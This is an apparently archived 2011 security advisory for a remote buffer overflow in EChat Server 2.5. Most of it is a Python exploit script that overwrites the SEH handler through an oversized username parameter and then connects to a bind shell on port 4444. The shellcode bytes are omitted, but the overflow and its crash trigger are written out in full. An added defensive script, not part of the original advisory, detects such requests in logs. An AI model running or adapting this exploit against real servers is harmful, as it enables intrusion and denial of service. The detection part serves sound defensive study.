SECURITYVULNS:DOC:26856
History: Aug 17, 2011 - 12:00 a.m.

INSECT Pro - Exploit EChat Server <= v2.5 20110812 - Remote Buffer Overflow Exploit

Source: vulners.com

Information

Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>

Description

EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Exploit example as follows:

#!/usr/bin/python
# Easy Chat Server <= v2.5 Remote Buffer Overflow Exploit
#
# Written by Juan Sacco (Runlvl)
# Contact: [email protected]
# Web site: http://www.insecurityresearch.com
#
# Target tested: Windows XP SP3

import sys
import httplib
import telnetlib


def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)


def run():
    try:
        # Basic structure: JUNK + nSEH + SEH + SHELLCODE
        Junk = '\x41' * 216            # 216 bytes of 'A' to reach the SEH record
        nSEH = '\xEB\x06\x90\x90'      # short jmp +6 over the handler address
        SEH = '\xE1\xB2\x01\x10'       # 0x1001b2e1 pop edi; pop esi; ret

        # ShellCode: bind TCP shell (the script connects to ShellCodePort below),
        # length 751, encoder: Alpha Upper. The original 751-byte encoded payload
        # is omitted from this listing; the empty placeholder keeps the script
        # syntactically valid, but without a payload the request only triggers
        # the overflow.
        ShellCode = ''
        ShellCodePort = 4444
        CraftedBuffer = Junk + nSEH + SEH + ShellCode
        vulnerableURL = ('/chat.ghp?username=' + CraftedBuffer +
                         '&password=null&room=1&null=2')

        Connection = httplib.HTTPConnection(Host, Port)
        Connection.request('GET', vulnerableURL)
        Connection.close()

        print "Connecting to " + Host
        TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
        TelnetConnection.interact()
    except Exception:
        print "Exploit connection closed"


if __name__ == '__main__':
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"

    try:
        Host = sys.argv[1]
        Port = int(sys.argv[2])
    except IndexError:
        howtousage()
    run()
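From the defender's side, a request-log check for the shape of the overflow request shown above: an added example, not code from the advisory or from INSECT Pro. The path /chat.ghp and the username parameter come from the exploit; the length and padding thresholds, the function names and the sample request lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Thresholds are assumptions for this example: chat usernames are short, while the
# advisory's crafted value is 216 + 4 + 4 + 751 bytes long.
MAX_USERNAME_LEN = 64
MIN_PAD_RUN = 32   # a long run of a single repeated byte is the "JUNK" filler


def query_params(query):
    """Split a raw query string into (name, value_bytes) pairs without lossy decoding."""
    pairs = []
    for field in query.split('&'):
        if field:
            name, _, value = field.partition('=')
            pairs.append((name, unquote_to_bytes(value.replace('+', ' '))))
    return pairs


def inspect_request(request_line):
    """Return the reasons a chat.ghp request looks like an overflow attempt ([] if benign)."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    url = urlsplit(parts[1])
    if not url.path.lower().endswith('/chat.ghp'):
        return []
    reasons = []
    for name, value in query_params(url.query):
        if name != 'username':
            continue
        if len(value) > MAX_USERNAME_LEN:
            reasons.append('username length %d exceeds %d' % (len(value), MAX_USERNAME_LEN))
        if re.search(rb'(.)\1{%d,}' % (MIN_PAD_RUN - 1), value, re.DOTALL):
            reasons.append('long run of one repeated byte (overflow padding)')
        if any(b < 0x20 or b > 0x7e for b in value):
            reasons.append('non-printable bytes (raw addresses/opcodes) in username')
    return reasons


# Constructed sample request lines: an ordinary login, and one shaped like the
# advisory's payload (216 'A' filler, percent-encoded nSEH/SEH bytes, then 'P'
# filler standing in for the encoded shellcode).
BENIGN = 'GET /chat.ghp?username=alice&password=null&room=1 HTTP/1.1'
CRAFTED = ('GET /chat.ghp?username=' + 'A' * 216 + '%EB%06%90%90%E1%B2%01%10'
           + 'P' * 40 + '&password=null&room=1&null=2 HTTP/1.1')

if __name__ == '__main__':
    for line in (BENIGN, CRAFTED):
        print(line[:60] + '...', '->', inspect_request(line) or 'ok')
```

The same three checks (oversized value, repeated-byte padding, raw non-printable bytes in a text parameter) transfer to any web-form overflow of this family; only the path and parameter name are specific to EChat Server.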

Author

Juan Sacco (Runlvl) - http://www.insecurityresearch.com

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released, stay tuned